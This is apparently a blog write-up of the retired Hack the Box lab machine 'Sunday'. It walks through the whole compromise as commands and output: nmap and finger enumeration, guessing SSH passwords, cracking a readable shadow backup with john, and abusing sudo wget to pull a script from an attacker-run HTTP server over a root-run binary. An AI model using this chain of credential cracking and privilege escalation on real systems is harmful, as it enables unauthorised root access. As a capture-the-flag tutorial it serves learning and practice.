Next up in my series of guides to retired Hack the Box machines, is my writeup of Sunday. This is listed as a 20 point box so it should be quite simple, however there were a couple of trolling moments in the course of exploiting it.

Enumeration

So lets start as always with our nmap scan. It can take quite a while on this box, so be patient, go and make a cup of tea or grab something stronger.

$ nmap -sC -sV -p- -oA nmap/scan 10.10.10.76

nmap_scan

We can see a few interesting ports open here; firstly the finger service port which nmap has helpfully already ran a script against to enumerate some users. Here we can see a user called sunny is logged in. We can also see that ssh is available, albeit on a different port to usual.

As we have a username, and an ssh service, the first thing we will try is a few guesses of basic passwords: sunny, password, sunday, and bang, sunday gets us in!

$ ssh -p 22022 [email protected]

ssh_sunny

So now we have a shell lets see if we have a user flag in the usual place of the Desktop folder ... and unfortunately it would seem that this is not the user we need. Time to enumerate further.

Further Enumeration

Checking the /etc/passwd file we can see another user account called sammy.

$ cat /etc/passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
...
...
...
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash

That looks like a good candidate for us to aim for. Running sudo -l shows us a binary file we can run as root without a password; which is aptly named /root/troll. Running that file simply prints out testing and the output of the id command.

troll

With that deadend, we start enumerating the box further, and in our investigations we come across a backup folder which seems to contain a readable copy of the shadow file.

$ cd /backup
$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

So with both this shadow file and the standard passwd file we can make local copies of them and start up john the ripper.

$ unshadow passwd shadow > passwords.txt
$ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Warning: detected hash type "sha256crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Remaining 1 password hash
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
1g 0:00:02:32 DONE (2018-05-09 20:21) 0.006559g/s 1336p/s 1336c/s 1336C/s coolster..chs2009
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ john --show passwords.txt
sammy:cooldude!:101:10:sammy:/export/home/sammy:/bin/bash
sunny:sunday:65535:1:sunny:/export/home/sunny:/bin/bash

2 password hashes cracked, 0 left

We have sammy's password, so now we can ssh in as sammy and finally we have access to the user flag!

Yet More Enumeration

As we are now logged in as a new user account, we start our enumeration again. Checking sudo -l again shows us that this user is able to run the wget command as root without any passwords. So maybe we can chain this together with the binary from the previous user account and get root.

First thing we do is create a very small bash script:

#!/bin/bash

su

Then we fire up a simple HTTP server using python, then in our sammy ssh session we can run the following:

$ wget http://10.10.14.15:8000/su.sh -O /root/troll

Everything downloads fine, but by time we have swapped over to our sunny ssh account the troll binary seems to have not been overwritten, and just prints the same output as before. Hmmm, this binary is definitely well named.

Looking at the processes running on this machine we spot a script running in the root directory called overwrite, so we can surmise that any changes to the troll binary will get overwritten in a short time frame. We should still have a small window, however.

So we set up concurrent ssh sessions, each logged in as the different users we have the passwords for. Then we wget our script in one window, quickly switch over to the other window and run the troll binary.

root_access

And there we have root, and access to this final flag!